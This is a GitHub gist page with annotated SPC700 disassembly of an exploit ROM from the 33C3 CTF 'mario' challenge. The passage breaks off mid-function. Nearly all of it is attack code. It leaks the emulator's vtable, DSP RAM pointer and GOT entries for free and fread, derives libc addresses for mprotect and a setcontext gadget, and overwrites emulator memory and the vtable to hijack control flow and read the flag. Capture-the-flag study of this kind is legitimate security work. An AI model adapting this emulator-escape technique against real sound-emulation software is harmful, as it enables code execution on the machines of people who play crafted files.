Skip to content

Instantly share code, notes, and snippets.

@L4ys

L4ys/play_me.asm Secret

Last active January 1, 2017 13:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save L4ys/09878e88d1dd344e2ee854946d46c96e to your computer and use it in GitHub Desktop.
Save L4ys/09878e88d1dd344e2ee854946d46c96e to your computer and use it in GitHub Desktop.
Download ZIP
disassembly code of mario from 33C3 CTF
Raw
play_me.asm
ram[0x10] = 0xf10b ; save return address
call vul
{
f100: cd 0b mov x,#$0b
f102: d8 10 mov $10,x
f104: cd f1 mov x,#$f1
f106: d8 11 mov $11,x
f108: 3f 2e f8 call $f82e
}
read(0xea7c, 0xfe20, 8) ; 0xffffec7c (Spc_Emu.vtable) -> ram[0x20]
{
f10b: cd 7c mov x,#$7c
f10d: d8 00 mov $00,x
f10f: cd ea mov x,#$ea
f111: d8 01 mov $01,x
f113: cd 20 mov x,#$20
f115: d8 02 mov $02,x
f117: cd fe mov x,#$fe
f119: d8 03 mov $03,x
f11b: cd 08 mov x,#$08
f11d: d8 04 mov $04,x
f11f: 3f 5d f8 call $f85d
}
read(0xf954, fe28, 8) ; 0xfffffb54 (Spc_Dsp::ram pointer) to ram[0x28]
{
f122: cd 54 mov x,#$54
f124: d8 00 mov $00,x
f126: cd f9 mov x,#$f9
f128: d8 01 mov $01,x
f12a: cd 28 mov x,#$28
f12c: d8 02 mov $02,x
f12e: cd fe mov x,#$fe
f130: d8 03 mov $03,x
f132: cd 08 mov x,#$08
f134: d8 04 mov $04,x
f136: 3f 5d f8 call $f85d
}
ram[0x40] = 0xffffffffffffee1c
{
f139: cd 1c mov x,#$1c
f13b: d8 40 mov $40,x
f13d: cd ee mov x,#$ee
f13f: d8 41 mov $41,x
f141: cd ff mov x,#$ff
f143: d8 42 mov $42,x
f145: cd ff mov x,#$ff
f147: d8 43 mov $43,x
f149: cd ff mov x,#$ff
f14b: d8 44 mov $44,x
f14d: cd ff mov x,#$ff
f14f: d8 45 mov $45,x
f151: cd ff mov x,#$ff
f153: d8 46 mov $46,x
f155: cd ff mov x,#$ff
f157: d8 47 mov $47,x
}
add(0x28, 0x40, 0x30); ram[0x30] = ram-4580 ( points to spc file buf )
{
f159: cd 28 mov x,#$28
f15b: d8 00 mov $00,x
f15d: cd 00 mov x,#$00
f15f: d8 01 mov $01,x
f161: cd 40 mov x,#$40
f163: d8 02 mov $02,x
f165: cd 00 mov x,#$00
f167: d8 03 mov $03,x
f169: cd 30 mov x,#$30
f16b: d8 04 mov $04,x
f16d: cd 00 mov x,#$00
f16f: d8 05 mov $05,x
f171: 3f ee f7 call $f7ee
}
ram[0x10] = 0xf187 ; save return address
ram[0x08] = leak(ram[0x30]) ; pbuf
{
f174: cd 30 mov x,#$30
f176: d8 00 mov $00,x
f178: cd 38 mov x,#$38
f17a: d8 01 mov $01,x
f17c: cd 87 mov x,#$87
f17e: d8 10 mov $10,x
f180: cd f1 mov x,#$f1
f182: d8 11 mov $11,x
f184: 3f a1 f6 call $f6a1
}
ram[0x40] = 0x2e
{
f187: cd 2e mov x,#$2e
f189: d8 40 mov $40,x
f18b: cd 00 mov x,#$00
f18d: d8 41 mov $41,x
f18f: cd 00 mov x,#$00
f191: d8 42 mov $42,x
f193: cd 00 mov x,#$00
f195: d8 43 mov $43,x
f197: cd 00 mov x,#$00
f199: d8 44 mov $44,x
f19b: cd 00 mov x,#$00
f19d: d8 45 mov $45,x
f19f: cd 00 mov x,#$00
f1a1: d8 46 mov $46,x
f1a3: cd 00 mov x,#$00
f1a5: d8 47 mov $47,x
}
add(0x38, 0x40, 0x30) ; ram[0x38] = ptr to flag
{
f1a7: cd 38 mov x,#$38
f1a9: d8 00 mov $00,x
f1ab: cd 00 mov x,#$00
f1ad: d8 01 mov $01,x
f1af: cd 40 mov x,#$40
f1b1: d8 02 mov $02,x
f1b3: cd 00 mov x,#$00
f1b5: d8 03 mov $03,x
f1b7: cd 30 mov x,#$30
f1b9: d8 04 mov $04,x
f1bb: cd 00 mov x,#$00
f1bd: d8 05 mov $05,x
f1bf: 3f ee f7 call $f7ee
}
ram[0x10] = 0xf1d5
ram[0xa0] = leak(file+0x2e)
{
f1c2: cd 30 mov x,#$30
f1c4: d8 00 mov $00,x
f1c6: cd a0 mov x,#$a0
f1c8: d8 01 mov $01,x
f1ca: cd d5 mov x,#$d5
f1cc: d8 10 mov $10,x
f1ce: cd f1 mov x,#$f1
f1d0: d8 11 mov $11,x
f1d2: 3f a1 f6 call $f6a1
}
ram[0x40] = 8
{
f1d5: cd 08 mov x,#$08
f1d7: d8 40 mov $40,x
f1d9: cd 00 mov x,#$00
f1db: d8 41 mov $41,x
f1dd: cd 00 mov x,#$00
f1df: d8 42 mov $42,x
f1e1: cd 00 mov x,#$00
f1e3: d8 43 mov $43,x
f1e5: cd 00 mov x,#$00
f1e7: d8 44 mov $44,x
f1e9: cd 00 mov x,#$00
f1eb: d8 45 mov $45,x
f1ed: cd 00 mov x,#$00
f1ef: d8 46 mov $46,x
f1f1: cd 00 mov x,#$00
f1f3: d8 47 mov $47,x
}
add(0x30, 0x40, 0x30)
{
f1f5: cd 30 mov x,#$30
f1f7: d8 00 mov $00,x
f1f9: cd 00 mov x,#$00
f1fb: d8 01 mov $01,x
f1fd: cd 40 mov x,#$40
f1ff: d8 02 mov $02,x
f201: cd 00 mov x,#$00
f203: d8 03 mov $03,x
f205: cd 30 mov x,#$30
f207: d8 04 mov $04,x
f209: cd 00 mov x,#$00
f20b: d8 05 mov $05,x
f20d: 3f ee f7 call $f7ee
]
ram[0x10] = 0xf223
ram[0xa8] = leak(file+0x2e+8)
{
f210: cd 30 mov x,#$30
f212: d8 00 mov $00,x
f214: cd a8 mov x,#$a8
f216: d8 01 mov $01,x
f218: cd 23 mov x,#$23
f21a: d8 10 mov $10,x
f21c: cd f2 mov x,#$f2
f21e: d8 11 mov $11,x
f220: 3f a1 f6 call $f6a1
}
ram[0x40] = 8
{
f223: cd 08 mov x,#$08
f225: d8 40 mov $40,x
f227: cd 00 mov x,#$00
f229: d8 41 mov $41,x
f22b: cd 00 mov x,#$00
f22d: d8 42 mov $42,x
f22f: cd 00 mov x,#$00
f231: d8 43 mov $43,x
f233: cd 00 mov x,#$00
f235: d8 44 mov $44,x
f237: cd 00 mov x,#$00
f239: d8 45 mov $45,x
f23b: cd 00 mov x,#$00
f23d: d8 46 mov $46,x
f23f: cd 00 mov x,#$00
f241: d8 47 mov $47,x
}
add(0x30, 0x40, 0x30)
{
f243: cd 30 mov x,#$30
f245: d8 00 mov $00,x
f247: cd 00 mov x,#$00
f249: d8 01 mov $01,x
f24b: cd 40 mov x,#$40
f24d: d8 02 mov $02,x
f24f: cd 00 mov x,#$00
f251: d8 03 mov $03,x
f253: cd 30 mov x,#$30
f255: d8 04 mov $04,x
f257: cd 00 mov x,#$00
f259: d8 05 mov $05,x
f25b: 3f ee f7 call $f7ee
}
ram[0x10] = 0xf271
ram[0xb0] = leak(file+0x2e+8+8)
{
f25e: cd 30 mov x,#$30
f260: d8 00 mov $00,x
f262: cd b0 mov x,#$b0
f264: d8 01 mov $01,x
f266: cd 71 mov x,#$71
f268: d8 10 mov $10,x
f26a: cd f2 mov x,#$f2
f26c: d8 11 mov $11,x
f26e: 3f a1 f6 call $f6a1
}
ram[0x40] = 8
{
f271: cd 08 mov x,#$08
f273: d8 40 mov $40,x
f275: cd 00 mov x,#$00
f277: d8 41 mov $41,x
f279: cd 00 mov x,#$00
f27b: d8 42 mov $42,x
f27d: cd 00 mov x,#$00
f27f: d8 43 mov $43,x
f281: cd 00 mov x,#$00
f283: d8 44 mov $44,x
f285: cd 00 mov x,#$00
f287: d8 45 mov $45,x
f289: cd 00 mov x,#$00
f28b: d8 46 mov $46,x
f28d: cd 00 mov x,#$00
f28f: d8 47 mov $47,x
}
add(0x30, 0x40, 0x30)
{
f291: cd 30 mov x,#$30
f293: d8 00 mov $00,x
f295: cd 00 mov x,#$00
f297: d8 01 mov $01,x
f299: cd 40 mov x,#$40
f29b: d8 02 mov $02,x
f29d: cd 00 mov x,#$00
f29f: d8 03 mov $03,x
f2a1: cd 30 mov x,#$30
f2a3: d8 04 mov $04,x
f2a5: cd 00 mov x,#$00
f2a7: d8 05 mov $05,x
f2a9: 3f ee f7 call $f7ee
}
ram[0x10] = 0xf2bf
ram[0xb8] = leak(file+0x2e+8+8+8)
{
f2ac: cd 30 mov x,#$30
f2ae: d8 00 mov $00,x
f2b0: cd b8 mov x,#$b8
f2b2: d8 01 mov $01,x
f2b4: cd bf mov x,#$bf
f2b6: d8 10 mov $10,x
f2b8: cd f2 mov x,#$f2
f2ba: d8 11 mov $11,x
f2bc: 3f a1 f6 call $f6a1
}
ram[0x40] = 0x0718
{
f2bf: cd 18 mov x,#$18
f2c1: d8 40 mov $40,x
f2c3: cd 07 mov x,#$07
f2c5: d8 41 mov $41,x
f2c7: cd 00 mov x,#$00
f2c9: d8 42 mov $42,x
f2cb: cd 00 mov x,#$00
f2cd: d8 43 mov $43,x
f2cf: cd 00 mov x,#$00
f2d1: d8 44 mov $44,x
f2d3: cd 00 mov x,#$00
f2d5: d8 45 mov $45,x
f2d7: cd 00 mov x,#$00
f2d9: d8 46 mov $46,x
f2db: cd 00 mov x,#$00
f2dd: d8 47 mov $47,x
}
add(0x20, 0x40, 0x30) ; ram[0x30] = vtable + 0x718 ( free@got )
{
f2df: cd 20 mov x,#$20
f2e1: d8 00 mov $00,x
f2e3: cd 00 mov x,#$00
f2e5: d8 01 mov $01,x
f2e7: cd 40 mov x,#$40
f2e9: d8 02 mov $02,x
f2eb: cd 00 mov x,#$00
f2ed: d8 03 mov $03,x
f2ef: cd 30 mov x,#$30
f2f1: d8 04 mov $04,x
f2f3: cd 00 mov x,#$00
f2f5: d8 05 mov $05,x
f2f7: 3f ee f7 call $f7ee
}
ram[0x10] = 0xf30d
ram[0x38] = leak(free@got)
{
f2fa: cd 30 mov x,#$30
f2fc: d8 00 mov $00,x
f2fe: cd 38 mov x,#$38
f300: d8 01 mov $01,x
f302: cd 0d mov x,#$0d
f304: d8 10 mov $10,x
f306: cd f3 mov x,#$f3
f308: d8 11 mov $11,x
f30a: 3f a1 f6 call $f6a1
}
ram[0x40] = 0x0738
{
f30d: cd 38 mov x,#$38
f30f: d8 40 mov $40,x
f311: cd 07 mov x,#$07
f313: d8 41 mov $41,x
f315: cd 00 mov x,#$00
f317: d8 42 mov $42,x
f319: cd 00 mov x,#$00
f31b: d8 43 mov $43,x
f31d: cd 00 mov x,#$00
f31f: d8 44 mov $44,x
f321: cd 00 mov x,#$00
f323: d8 45 mov $45,x
f325: cd 00 mov x,#$00
f327: d8 46 mov $46,x
f329: cd 00 mov x,#$00
f32b: d8 47 mov $47,x
}
add(0x20,0x40,0x30) ; ram[0x30] = ram[0x20] + 0x738 ( fread@got )
{
f32d: cd 20 mov x,#$20
f32f: d8 00 mov $00,x
f331: cd 00 mov x,#$00
f333: d8 01 mov $01,x
f335: cd 40 mov x,#$40
f337: d8 02 mov $02,x
f339: cd 00 mov x,#$00
f33b: d8 03 mov $03,x
f33d: cd 30 mov x,#$30
f33f: d8 04 mov $04,x
f341: cd 00 mov x,#$00
f343: d8 05 mov $05,x
f345: 3f ee f7 call $f7ee
}
ram[0x10] = 0xf35b
ram[0x30] = leak(fread@got)
{
f348: cd 30 mov x,#$30
f34a: d8 00 mov $00,x
f34c: cd 30 mov x,#$30
f34e: d8 01 mov $01,x
f350: cd 5b mov x,#$5b
f352: d8 10 mov $10,x
f354: cd f3 mov x,#$f3
f356: d8 11 mov $11,x
f358: 3f a1 f6 call $f6a1
}
sub(0x38, 0x30, 0x30) ; ram[0x30] = ram[0x38] - ram[0x30] ( free-fread )
{
f35b: cd 38 mov x,#$38
f35d: d8 00 mov $00,x
f35f: cd 00 mov x,#$00
f361: d8 01 mov $01,x
f363: cd 30 mov x,#$30
f365: d8 02 mov $02,x
f367: cd 00 mov x,#$00
f369: d8 03 mov $03,x
f36b: cd 30 mov x,#$30
f36d: d8 04 mov $04,x
f36f: cd 00 mov x,#$00
f371: d8 05 mov $05,x
f373: 3f 05 f8 call $f805
}
add(0x30, 0xa0, 0xa0) ; ram[0xa0] += ram[0x30]
{
f376: cd 30 mov x,#$30
f378: d8 00 mov $00,x
f37a: cd 00 mov x,#$00
f37c: d8 01 mov $01,x
f37e: cd a0 mov x,#$a0
f380: d8 02 mov $02,x
f382: cd 00 mov x,#$00
f384: d8 03 mov $03,x
f386: cd a0 mov x,#$a0
f388: d8 04 mov $04,x
f38a: cd 00 mov x,#$00
f38c: d8 05 mov $05,x
f38e: 3f ee f7 call $f7ee
}
add(0xa3, 0x30, 0xa3) ; ram[0xa3] += ram[0x30]
{
f391: cd a3 mov x,#$a3
f393: d8 00 mov $00,x
f395: cd 00 mov x,#$00
f397: d8 01 mov $01,x
f399: cd 30 mov x,#$30
f39b: d8 02 mov $02,x
f39d: cd 00 mov x,#$00
f39f: d8 03 mov $03,x
f3a1: cd a3 mov x,#$a3
f3a3: d8 04 mov $04,x
f3a5: cd 00 mov x,#$00
f3a7: d8 05 mov $05,x
f3a9: 3f ee f7 call $f7ee
}
add(0x30, 0xa6, 0xa6) ; ram[0xa6] += ram[0x30]
{
f3ac: cd 30 mov x,#$30
f3ae: d8 00 mov $00,x
f3b0: cd 00 mov x,#$00
f3b2: d8 01 mov $01,x
f3b4: cd a6 mov x,#$a6
f3b6: d8 02 mov $02,x
f3b8: cd 00 mov x,#$00
f3ba: d8 03 mov $03,x
f3bc: cd a6 mov x,#$a6
f3be: d8 04 mov $04,x
f3c0: cd 00 mov x,#$00
f3c2: d8 05 mov $05,x
f3c4: 3f ee f7 call $f7ee
}
add(0xa9, 0x30, 0xa9) ; ram[0xa9] += ram[0x30]
{
f3c7: cd a9 mov x,#$a9
f3c9: d8 00 mov $00,x
f3cb: cd 00 mov x,#$00
f3cd: d8 01 mov $01,x
f3cf: cd 30 mov x,#$30
f3d1: d8 02 mov $02,x
f3d3: cd 00 mov x,#$00
f3d5: d8 03 mov $03,x
f3d7: cd a9 mov x,#$a9
f3d9: d8 04 mov $04,x
f3db: cd 00 mov x,#$00
f3dd: d8 05 mov $05,x
f3df: 3f ee f7 call $f7ee
}
add(0x30, 0xac, 0xac) ; ram[0xac] += ram[0x30]
{
f3e2: cd 30 mov x,#$30
f3e4: d8 00 mov $00,x
f3e6: cd 00 mov x,#$00
f3e8: d8 01 mov $01,x
f3ea: cd ac mov x,#$ac
f3ec: d8 02 mov $02,x
f3ee: cd 00 mov x,#$00
f3f0: d8 03 mov $03,x
f3f2: cd ac mov x,#$ac
f3f4: d8 04 mov $04,x
f3f6: cd 00 mov x,#$00
f3f8: d8 05 mov $05,x
f3fa: 3f ee f7 call $f7ee
}
add(0xaf, 0x30, 0xaf) ; ram[0xaf] += ram[0x30]
{
f3fd: cd af mov x,#$af
f3ff: d8 00 mov $00,x
f401: cd 00 mov x,#$00
f403: d8 01 mov $01,x
f405: cd 30 mov x,#$30
f407: d8 02 mov $02,x
f409: cd 00 mov x,#$00
f40b: d8 03 mov $03,x
f40d: cd af mov x,#$af
f40f: d8 04 mov $04,x
f411: cd 00 mov x,#$00
f413: d8 05 mov $05,x
f415: 3f ee f7 call $f7ee
}
add(0x30, 0xb2, 0xb2) ; ram[0xb2] += ram[0x30]
{
f418: cd 30 mov x,#$30
f41a: d8 00 mov $00,x
f41c: cd 00 mov x,#$00
f41e: d8 01 mov $01,x
f420: cd b2 mov x,#$b2
f422: d8 02 mov $02,x
f424: cd 00 mov x,#$00
f426: d8 03 mov $03,x
f428: cd b2 mov x,#$b2
f42a: d8 04 mov $04,x
f42c: cd 00 mov x,#$00
f42e: d8 05 mov $05,x
f430: 3f ee f7 call $f7ee
}
add(0xb5, 0x30, 0xb5) ; ram[0xb5] += ram[0x30]
{
f433: cd b5 mov x,#$b5
f435: d8 00 mov $00,x
f437: cd 00 mov x,#$00
f439: d8 01 mov $01,x
f43b: cd 30 mov x,#$30
f43d: d8 02 mov $02,x
f43f: cd 00 mov x,#$00
f441: d8 03 mov $03,x
f443: cd b5 mov x,#$b5
f445: d8 04 mov $04,x
f447: cd 00 mov x,#$00
f449: d8 05 mov $05,x
f44b: 3f ee f7 call $f7ee
}
add(0x30, 0xb8, 0xb8) ; ram[0xb8] += ram[0x30]
{
f44e: cd 30 mov x,#$30
f450: d8 00 mov $00,x
f452: cd 00 mov x,#$00
f454: d8 01 mov $01,x
f456: cd b8 mov x,#$b8
f458: d8 02 mov $02,x
f45a: cd 00 mov x,#$00
f45c: d8 03 mov $03,x
f45e: cd b8 mov x,#$b8
f460: d8 04 mov $04,x
f462: cd 00 mov x,#$00
f464: d8 05 mov $05,x
f466: 3f ee f7 call $f7ee
}
add(0xbb, 0x30, 0xbb) ; ram[0xbb] += ram[0x30]
{
f469: cd bb mov x,#$bb
f46b: d8 00 mov $00,x
f46d: cd 00 mov x,#$00
f46f: d8 01 mov $01,x
f471: cd 30 mov x,#$30
f473: d8 02 mov $02,x
f475: cd 00 mov x,#$00
f477: d8 03 mov $03,x
f479: cd bb mov x,#$bb
f47b: d8 04 mov $04,x
f47d: cd 00 mov x,#$00
f47f: d8 05 mov $05,x
f481: 3f ee f7 call $f7ee
}
add(0x30, 0xbe, 0xbe) ; ram[0xbe] += ram[0x30]
{
f484: cd 30 mov x,#$30
f486: d8 00 mov $00,x
f488: cd 00 mov x,#$00
f48a: d8 01 mov $01,x
f48c: cd be mov x,#$be
f48e: d8 02 mov $02,x
f490: cd 00 mov x,#$00
f492: d8 03 mov $03,x
f494: cd be mov x,#$be
f496: d8 04 mov $04,x
f498: cd 00 mov x,#$00
f49a: d8 05 mov $05,x
f49c: 3f ee f7 call $f7ee
}
check()
f49f: 3f 82 f6 call $f682
ram[0x40] = 0xfffffffffffc68e5
{
f4a2: cd e5 mov x,#$e5
f4a4: d8 40 mov $40,x
f4a6: cd 68 mov x,#$68
f4a8: d8 41 mov $41,x
f4aa: cd fc mov x,#$fc
f4ac: d8 42 mov $42,x
f4ae: cd ff mov x,#$ff
f4b0: d8 43 mov $43,x
f4b2: cd ff mov x,#$ff
f4b4: d8 44 mov $44,x
f4b6: cd ff mov x,#$ff
f4b8: d8 45 mov $45,x
f4ba: cd ff mov x,#$ff
f4bc: d8 46 mov $46,x
f4be: cd ff mov x,#$ff
f4c0: d8 47 mov $47,x
}
add(0x40, 0x38, 0x80) ; ram[0x80] = free - 0x3971b ( libc + 0x41BD5, setcontext + 0x35 )
{
f4c2: cd 40 mov x,#$40
f4c4: d8 00 mov $00,x
f4c6: cd 00 mov x,#$00
f4c8: d8 01 mov $01,x
f4ca: cd 38 mov x,#$38
f4cc: d8 02 mov $02,x
f4ce: cd 00 mov x,#$00
f4d0: d8 03 mov $03,x
f4d2: cd 80 mov x,#$80
f4d4: d8 04 mov $04,x
f4d6: cd 00 mov x,#$00
f4d8: d8 05 mov $05,x
f4da: 3f ee f7 call $f7ee
}
ram[0x40] = 0x068ec0
{
f4dd: cd c0 mov x,#$c0
f4df: d8 40 mov $40,x
f4e1: cd 8e mov x,#$8e
f4e3: d8 41 mov $41,x
f4e5: cd 06 mov x,#$06
f4e7: d8 42 mov $42,x
f4e9: cd 00 mov x,#$00
f4eb: d8 43 mov $43,x
f4ed: cd 00 mov x,#$00
f4ef: d8 44 mov $44,x
f4f1: cd 00 mov x,#$00
f4f3: d8 45 mov $45,x
f4f5: cd 00 mov x,#$00
f4f7: d8 46 mov $46,x
f4f9: cd 00 mov x,#$00
f4fb: d8 47 mov $47,x
}
add(0x40, 0x38, 0x50) ; ram[0x50] = free@got + 0x68ec0 = libc.mprotect
{
f4fd: cd 40 mov x,#$40
f4ff: d8 00 mov $00,x
f501: cd 00 mov x,#$00
f503: d8 01 mov $01,x
f505: cd 38 mov x,#$38
f507: d8 02 mov $02,x
f509: cd 00 mov x,#$00
f50b: d8 03 mov $03,x
f50d: cd 50 mov x,#$50
f50f: d8 04 mov $04,x
f511: cd 00 mov x,#$00
f513: d8 05 mov $05,x
f515: 3f ee f7 call $f7ee
}
read(0xfe50, 0xeb24, 8) ; ram[0x50](mprotect) -> 0xffffed24
{
f518: cd 50 mov x,#$50
f51a: d8 00 mov $00,x
f51c: cd fe mov x,#$fe
f51e: d8 01 mov $01,x
f520: cd 24 mov x,#$24
f522: d8 02 mov $02,x
f524: cd eb mov x,#$eb
f526: d8 03 mov $03,x
f528: cd 08 mov x,#$08
f52a: d8 04 mov $04,x
f52c: 3f 5d f8 call $f85d
}
ram[0x50] = ram[0x28](ram ptr) & 0xffff0000
{
f52f: f8 28 mov x,$28
f531: d8 50 mov $50,x
f533: f8 29 mov x,$29
f535: d8 51 mov $51,x
f537: f8 2a mov x,$2a
f539: d8 52 mov $52,x
f53b: f8 2b mov x,$2b
f53d: d8 53 mov $53,x
f53f: f8 2c mov x,$2c
f541: d8 54 mov $54,x
f543: f8 2d mov x,$2d
f545: d8 55 mov $55,x
f547: f8 2e mov x,$2e
f549: d8 56 mov $56,x
f54b: f8 2f mov x,$2f
f54d: d8 57 mov $57,x
f54f: cd 00 mov x,#$00
f551: d8 50 mov $50,x
f553: d8 51 mov $51,x
}
read(0xfe50, 0xeae4, 8) ; ram[0x50] -> 0xffffece4
{
f555: cd 50 mov x,#$50
f557: d8 00 mov $00,x
f559: cd fe mov x,#$fe
f55b: d8 01 mov $01,x
f55d: cd e4 mov x,#$e4
f55f: d8 02 mov $02,x
f561: cd ea mov x,#$ea
f563: d8 03 mov $03,x
f565: cd 08 mov x,#$08
f567: d8 04 mov $04,x
f569: 3f 5d f8 call $f85d
}
ram[0x40] = 0x100000
{
f56c: cd 00 mov x,#$00
f56e: d8 40 mov $40,x
f570: cd 00 mov x,#$00
f572: d8 41 mov $41,x
f574: cd 10 mov x,#$10
f576: d8 42 mov $42,x
f578: cd 00 mov x,#$00
f57a: d8 43 mov $43,x
f57c: cd 00 mov x,#$00
f57e: d8 44 mov $44,x
f580: cd 00 mov x,#$00
f582: d8 45 mov $45,x
f584: cd 00 mov x,#$00
f586: d8 46 mov $46,x
f588: cd 00 mov x,#$00
f58a: d8 47 mov $47,x
}
read(0xfe40, 0xeaec, 8) ; ram[0x40](0) -> 0xffffecec
{
f58c: cd 40 mov x,#$40
f58e: d8 00 mov $00,x
f590: cd fe mov x,#$fe
f592: d8 01 mov $01,x
f594: cd ec mov x,#$ec
f596: d8 02 mov $02,x
f598: cd ea mov x,#$ea
f59a: d8 03 mov $03,x
f59c: cd 08 mov x,#$08
f59e: d8 04 mov $04,x
f5a0: 3f 5d f8 call $f85d
}
ram[0x40] = 0x7
{
f5a3: cd 07 mov x,#$07
f5a5: d8 40 mov $40,x
f5a7: cd 00 mov x,#$00
f5a9: d8 41 mov $41,x
f5ab: cd 00 mov x,#$00
f5ad: d8 42 mov $42,x
f5af: cd 00 mov x,#$00
f5b1: d8 43 mov $43,x
f5b3: cd 00 mov x,#$00
f5b5: d8 44 mov $44,x
f5b7: cd 00 mov x,#$00
f5b9: d8 45 mov $45,x
f5bb: cd 00 mov x,#$00
f5bd: d8 46 mov $46,x
f5bf: cd 00 mov x,#$00
f5c1: d8 47 mov $47,x
}
read(0xfe40, 0xeb04, 8) ; ram[0x40](7) -> 0xffffed04
{
f5c3: cd 40 mov x,#$40
f5c5: d8 00 mov $00,x
f5c7: cd fe mov x,#$fe
f5c9: d8 01 mov $01,x
f5cb: cd 04 mov x,#$04
f5cd: d8 02 mov $02,x
f5cf: cd eb mov x,#$eb
f5d1: d8 03 mov $03,x
f5d3: cd 08 mov x,#$08
f5d5: d8 04 mov $04,x
f5d7: 3f 5d f8 call $f85d
}
ram[0x40] = 0x70
{
f5da: cd 70 mov x,#$70
f5dc: d8 40 mov $40,x
f5de: cd 00 mov x,#$00
f5e0: d8 41 mov $41,x
f5e2: cd 00 mov x,#$00
f5e4: d8 42 mov $42,x
f5e6: cd 00 mov x,#$00
f5e8: d8 43 mov $43,x
f5ea: cd 00 mov x,#$00
f5ec: d8 44 mov $44,x
f5ee: cd 00 mov x,#$00
f5f0: d8 45 mov $45,x
f5f2: cd 00 mov x,#$00
f5f4: d8 46 mov $46,x
f5f6: cd 00 mov x,#$00
f5f8: d8 47 mov $47,x
}
add(0x40, 0x28, 0x50) ; ram[0x50] = ram + 0x70
{
f5fa: cd 40 mov x,#$40
f5fc: d8 00 mov $00,x
f5fe: cd 00 mov x,#$00
f600: d8 01 mov $01,x
f602: cd 28 mov x,#$28
f604: d8 02 mov $02,x
f606: cd 00 mov x,#$00
f608: d8 03 mov $03,x
f60a: cd 50 mov x,#$50
f60c: d8 04 mov $04,x
f60e: cd 00 mov x,#$00
f610: d8 05 mov $05,x
f612: 3f ee f7 call $f7ee
}
read(0xfe50, 0xeb1c, 8) ram[0x50](ram + 0x70) -> 0xffffed1c
{
f615: cd 50 mov x,#$50
f617: d8 00 mov $00,x
f619: cd fe mov x,#$fe
f61b: d8 01 mov $01,x
f61d: cd 1c mov x,#$1c
f61f: d8 02 mov $02,x
f621: cd eb mov x,#$eb
f623: d8 03 mov $03,x
f625: cd 08 mov x,#$08
f627: d8 04 mov $04,x
f629: 3f 5d f8 call $f85d
}
ram[0x40] = 0xfb00
{
f62c: cd 00 mov x,#$00
f62e: d8 40 mov $40,x
f630: cd fb mov x,#$fb
f632: d8 41 mov $41,x
f634: cd 00 mov x,#$00
f636: d8 42 mov $42,x
f638: cd 00 mov x,#$00
f63a: d8 43 mov $43,x
f63c: cd 00 mov x,#$00
f63e: d8 44 mov $44,x
f640: cd 00 mov x,#$00
f642: d8 45 mov $45,x
f644: cd 00 mov x,#$00
f646: d8 46 mov $46,x
f648: cd 00 mov x,#$00
f64a: d8 47 mov $47,x
}
add(0x40, 0x28, 0x70) ; ram[0x70] = ram[0x28](ram) + 0xfb00
{
f64c: cd 40 mov x,#$40
f64e: d8 00 mov $00,x
f650: cd 00 mov x,#$00
f652: d8 01 mov $01,x
f654: cd 28 mov x,#$28
f656: d8 02 mov $02,x
f658: cd 00 mov x,#$00
f65a: d8 03 mov $03,x
f65c: cd 70 mov x,#$70
f65e: d8 04 mov $04,x
f660: cd 00 mov x,#$00
f662: d8 05 mov $05,x
f664: 3f ee f7 call $f7ee
}
read(0xfe28, 0xea7c, 8) ram[0x28](ram) -> 0xffffec7c (vtable)
{
f667: cd 28 mov x,#$28
f669: d8 00 mov $00,x
f66b: cd fe mov x,#$fe
f66d: d8 01 mov $01,x
f66f: cd 7c mov x,#$7c
f671: d8 02 mov $02,x
f673: cd ea mov x,#$ea
f675: d8 03 mov $03,x
f677: cd 08 mov x,#$08
f679: d8 04 mov $04,x
f67b: 3f 5d f8 call $f85d
}
call wait()
f67e: 3f db f7 call $f7db
f681: ff stop
function check()
{
f682: e4 a0 mov a,$a0
f684: 68 92 cmp a,#$92
f686: d0 f9 bne $f681
f688: e4 a1 mov a,$a1
f68a: 68 6b cmp a,#$6b
f68c: d0 f3 bne $f681
f68e: e4 a2 mov a,$a2
f690: 68 44 cmp a,#$44
f692: d0 ed bne $f681
f694: e4 a3 mov a,$a3
f696: 68 92 cmp a,#$92
f698: d0 e7 bne $f681
f69a: e4 a4 mov a,$a4
f69c: 68 97 cmp a,#$97
f69e: d0 e1 bne $f681
f6a0: 6f ret
}
function leak(addr @ ram[0x01], out @ ram[0x02] )
{
ram[0x08] = ram[0]
f6a1: f8 00 mov x,$00
f6a3: d8 08 mov $08,x
f6a5: f8 01 mov x,$01
f6a7: d8 09 mov $09,x
ram[0x12] = ram[0x10]
f6a9: f8 10 mov x,$10
f6ab: d8 12 mov $12,x
f6ad: f8 11 mov x,$11
f6af: d8 13 mov $13,x
read(0xfexx, 0xfb44, 8) ; addr -> 0xfffffd44 (Spc_Emu::buf_begin)
f6b1: cd 00 mov x,#$00
f6b3: d8 00 mov $00,x
f6b5: cd fe mov x,#$fe
f6b7: d8 01 mov $01,x
f6b9: cd 44 mov x,#$44
f6bb: d8 02 mov $02,x
f6bd: cd fb mov x,#$fb
f6bf: d8 03 mov $03,x
f6c1: cd 08 mov x,#$08
f6c3: d8 04 mov $04,x
f6c5: f8 08 mov x,$08
f6c7: d8 00 mov $00,x
f6c9: 3f 5d f8 call $f85d
ram[0x40] = 8
f6cc: cd 08 mov x,#$08
f6ce: d8 40 mov $40,x
f6d0: cd 00 mov x,#$00
f6d2: d8 41 mov $41,x
f6d4: cd 00 mov x,#$00
f6d6: d8 42 mov $42,x
f6d8: cd 00 mov x,#$00
f6da: d8 43 mov $43,x
f6dc: cd 00 mov x,#$00
f6de: d8 44 mov $44,x
f6e0: cd 00 mov x,#$00
f6e2: d8 45 mov $45,x
f6e4: cd 00 mov x,#$00
f6e6: d8 46 mov $46,x
f6e8: cd 00 mov x,#$00
f6ea: d8 47 mov $47,x
add(0x30, 0x40, 0x48) ; ram[0x48] = ram[0x30] + 8
f6ec: cd 30 mov x,#$30
f6ee: d8 00 mov $00,x
f6f0: cd 00 mov x,#$00
f6f2: d8 01 mov $01,x
f6f4: cd 40 mov x,#$40
f6f6: d8 02 mov $02,x
f6f8: cd 00 mov x,#$00
f6fa: d8 03 mov $03,x
f6fc: cd 48 mov x,#$48
f6fe: d8 04 mov $04,x
f700: cd 00 mov x,#$00
f702: d8 05 mov $05,x
f704: 3f ee f7 call $f7ee
read(0xfe48, 0xfb4c, 8) ; ram[0x48] -> 0xfffffd4c (Spc_Emu::buf_end)
f707: cd 48 mov x,#$48
f709: d8 00 mov $00,x
f70b: cd fe mov x,#$fe
f70d: d8 01 mov $01,x
f70f: cd 4c mov x,#$4c
f711: d8 02 mov $02,x
f713: cd fb mov x,#$fb
f715: d8 03 mov $03,x
